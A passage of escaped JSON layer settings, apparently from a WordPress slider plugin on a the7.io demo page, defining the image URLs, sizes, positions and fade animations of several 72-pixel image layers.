7\",\"alias\":\"Pl03\",\"uid\":25,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl01-1.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"height\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-46px\",\"e\":true},\"n\":{\"v\":\"-46px\"},\"t\":{\"v\":\"-46px\"},\"m\":{\"v\":\"-46px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":17,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"26\":{\"text\":\"Image 7\",\"alias\":\"Pl04\",\"uid\":26,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl02.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"height\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"46px\",\"e\":true},\"n\":{\"v\":\"46px\"},\"t\":{\"v\":\"46px\"},\"m\":{\"v\":\"46px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":18,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":18,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"28\":{\"text\":\"Image 7\",\"alias\":\"Pl05\",\"uid\":28,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl05-1.png\"},\"size\":{\"width\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"height\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"138px\",\"e\":true},\"n\":{\"v\":\"138px\"},\"t\":{\"v\":\"138px\"},\"m\":{\"v\":\"138px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":19,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":19,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"30\":{\"text\":\"Image 7\",\"alias\":\"Pl06\",\"uid\":30,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl04-1.png\"},\"size\":{\"width\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"height\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"230px\",\"e\":true},\"n\":{\"v\":\"230px\"},\"t\":{\"v\":\"230px\"},\"m\":{\"v\":\"230px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":20,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":20,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"32\":{\"text\":\"Image 7\",\"alias\":\"Pl01\",\"uid\":32,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl00-1.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"79px\",\"e\":true},\"n\":{\"v\":\"79px\"},\"t\":{\"v\":\"79px\"},\"m\":{\"v\":\"79px\"}},\"height\":{\"d\":{\"v\":\"79px\",\"e\":true},\"n\":{\"v\":\"79px\"},\"t\":{\"v\":\"79px\"},\"m\":{\"v\":\"79px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-226px\",\"e\":true},\"n\":{\"v\":\"-226px\"},\"t\":{\"v\":\"-226px\"},\"m\":{\"v\":\"-226px\"}},\"y\":{\"d\":{\"v\":\"256px\",\"e\":true},\"n\":{\"v\":\"256px\"},\"t\":{\"v\":\"256px\"},\"m\":{\"v\":\"256px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":21,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":21,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 